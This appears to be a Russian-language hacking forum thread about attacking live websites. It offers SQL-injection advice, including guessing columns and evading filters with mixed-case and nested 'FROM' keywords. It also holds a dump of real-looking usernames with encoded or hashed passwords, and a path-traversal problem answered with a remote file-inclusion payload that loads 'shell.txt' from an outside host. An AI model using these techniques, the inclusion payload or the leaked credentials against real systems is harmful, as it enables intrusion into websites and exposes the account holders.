fobofob, подбирай таблицы вручную

Конечно не пашет! там не вильтрация, а ограничение прав. Те ж сказали, что даётся 1 БД на сайт. Значит всё просто, только столбцы нужно подобрать. А чтобы узнать имя БД - зарегай се аккаунт и посмотри. Вобщем проанализируй там всё.

а фильтрации часто можно обходить так. Например, если слово from, то FrOm frFROMom. Но на джино нет фильтрации

P.S. В разделе XSS я выладивал как активную, так и пассиивную.

и еще вопросик, что это за кодировка паролей :
art:=Ы#џlu/њ$ )
volov:FШ
bazin:VШЦб(¦
rozonova:NЕоА
gaponov:VМВ/юШ
malvina:з[^
anna:eЛдIн >(· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде

а может быть это просто кодировка дргуая?! Попробуй открыть ИнтернетЭксплорером и кодировку сменить на "автовыбор" или ещё чё...

Это логин и хэш) если я не ошибаюсь =)
Это я не знаю че за шифровка)

А это
Хэш MySQL =)
Вот ТУТ FAQ по хэшам

Это печально... Если мне не изменяет память это хеш пятого мускула

__________________

Кто я?..

Такой вопрос
Есть уязвимость, точнее есть ошибка в скрипте
при воде левых данных выводит
Invalid path for MapPath 'Skins/Default/Modules\../../../..].ascx'. A virtual path is expected.
тоесть в конце пути скрипт добавляет расширение ascx
пробовал добавить %00
непомогло
Подскажите плиз что делать

попробуй param=http://site.com/shell.txt?

попробуй добавить ?
и плюс попробуй "инклудить" файлы, что звщищены .htaccess